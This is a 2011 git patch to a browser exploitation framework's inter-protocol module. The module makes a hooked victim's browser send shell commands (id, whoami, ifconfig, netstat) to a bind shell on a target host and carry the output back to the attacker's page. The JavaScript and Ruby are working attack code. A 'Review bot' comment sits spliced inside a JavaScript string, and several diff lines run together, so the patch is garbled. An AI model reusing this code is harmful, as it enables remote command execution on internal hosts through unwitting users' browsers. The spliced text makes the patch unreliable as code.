From d0f0051878708784e757f8a70124918e9197efd4 Mon Sep 17 00:00:00 2001
From: "buherator@gmail.com"
Date: Sun, 2 Oct 2011 12:39:16 +0000
Subject: [PATCH] Fixed IPEC POSIX module
git-svn-id: https://beef.googlecode.com/svn/trunk@1340 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
---
 .../inter_protocol_posix_bindshell/command.js | 23 ++++++++++++-------
 .../inter_protocol_posix_bindshell/module.rb | 3 ++-
 2 files changed, 17 insertions(+), 9 deletions(-)
diff --git a/modules/ipec/inter_protocol_posix_bindshell/command.js b/modules/ipec/inter_protocol_posix_bindshell/command.js
index 318ac6b0d..0babf4451 100644
--- a/modules/ipec/inter_protocol_posix_bindshell/command.js
+++ b/modules/ipec/inter_protocol_posix_bindshell/command.js
@@ -20,6 +20,7 @@ beef.execute(function() {
 var cmd = '<%= @cmd %>';
 var command_timeout = "<%= @command_timeout %>";
 var internal_counter = 0;
+ var result_size = "<%= @result_size %>";
 // create iframe
 var iframe = document.createElement("iframe");
@@ -28,7 +29,7 @@ beef.execute(function() {
 document.body.appendChild(iframe);
 // send a request
- function send_cmds(ip, port, cmd) {
+ function send_cmds(ip, port, cmd, size) {
 var action = "http://" + ip + ":" + port + "/index.html?&/bin/sh&&";
 var parent = window.location.href;
@@ -45,16 +46,22 @@ beef.execute(function() {
 myExt = document.createElement("INPUT");
 myExt.setAttribute("id",<%= @command_id %>);
 myExt.setAttribute("name",<%= @command_id %>);
- myExt.setAttribute("value","echo \"
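Review bot: `var result_size = "<%= @result_size %>";` takes the operator-supplied value as a quoted string and never validates it, yet `send_cmds` later in this diff uses it in arithmetic (`size*1`), as the byte count for `head -c`, and as the counter of `while(--size)`; a value of `0` or a negative number makes that loop never terminate in the hooked browser, and a non-numeric value yields `Content-Length: NaN` and a broken `head` invocation on the target. I would coerce and bound it where it is declared: `var result_size = parseInt("<%= @result_size %>", 10);` followed by `if (!(result_size > 0)) result_size = 1024;` (1024 being the default the module.rb hunk sets). The enclosing `beef.execute(function() {` callback starts before this hunk.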
\" & " + cmd + " & echo Directory Contents: & ls -la & "); + myExt.setAttribute("value","echo -e HTTP/1.1 200 OK\\\\r;echo -e Content-Type: text/html\\\\r;echo -e Content-Length: "+(34+cmd.length+52+parent.length+115+size*1)+"\\\\r;echo -e Keep-Alive: timeout=5,max=100\\\\r;echo -e Connection: keep-alive\\\\r;echo -e \\\\r;echo \"
\";(" + cmd + ")|head -c "+size+" ; "); myform.appendChild(myExt); + // Adding puffer space for the command result + end_talkback=" echo -e \"__END_OF_POSIX_IPC<%= @command_id %>__
window.location='"+parent+"#ipc_result='+encodeURI(document.getElementById(\\\"ipc_content\\\").innerHTML);";
+ while(--size) end_talkback+=" ";
+ end_talkback+="\" \\\\r ; exit";
+
+
 // post js to call home and close connection
- myExt = document.createElement("INPUT");
- myExt.setAttribute("id","endTag");
- myExt.setAttribute("name","
"); - myExt.setAttribute("value","exit & echo \"__END_OF_POSIX_IPC<%= @command_id %>__window.location='"+parent+"#ipc_result='+encodeURI(document.getElementById(\\\"ipc_content\\\").innerHTML);\" & exit & exit & exit"); + myExt2 = document.createElement("INPUT"); + myExt2.setAttribute("id","endTag"); + myExt2.setAttribute("name",""); + myExt2.setAttribute("value",end_talkback); - myform.appendChild(myExt); + myform.appendChild(myExt2); myform.submit(); } @@ -88,7 +95,7 @@ beef.execute(function() { // send request and wait for reply } else { - send_cmds(target_ip, target_port, cmd); + send_cmds(target_ip, target_port, cmd,result_size); waituntilok(); } diff --git a/modules/ipec/inter_protocol_posix_bindshell/module.rb b/modules/ipec/inter_protocol_posix_bindshell/module.rb index 55f458aad..6c6de8bc5 100644 --- a/modules/ipec/inter_protocol_posix_bindshell/module.rb +++ b/modules/ipec/inter_protocol_posix_bindshell/module.rb @@ -61,7 +61,8 @@ class Inter_protocol_posix_bindshell < BeEF::Core::Command {'name'=>'ip', 'ui_label' => 'Target Address', 'value' => 'localhost'}, {'name'=>'port', 'ui_label' => 'Target Port', 'value' => '4444'}, {'name'=>'command_timeout', 'ui_label'=>'Timeout (s)', 'value'=>'30'}, - {'name'=>'cmd', 'ui_label' => 'Shell Commands', 'description' => 'Enter shell commands to execute. Note: the ampersands are required to seperate commands', 'type'=>'textarea', 'value'=>'echo User: & whoami & echo HostName: & hostname & ifconfig & netstat -an', 'width'=>'200px' } + {'name'=>'cmd', 'ui_label' => 'Shell Commands', 'description' => 'Enter shell commands to execute. Note: the semicolons are required to seperate commands', 'type'=>'textarea', 'value'=>'echo ID: ; id', 'width'=>'200px' }, + {'name'=>'result_size', 'ui_label'=>'Result Size', 'description'=>'Expected maximum size of the result in bytes','value'=>'1024'} ] end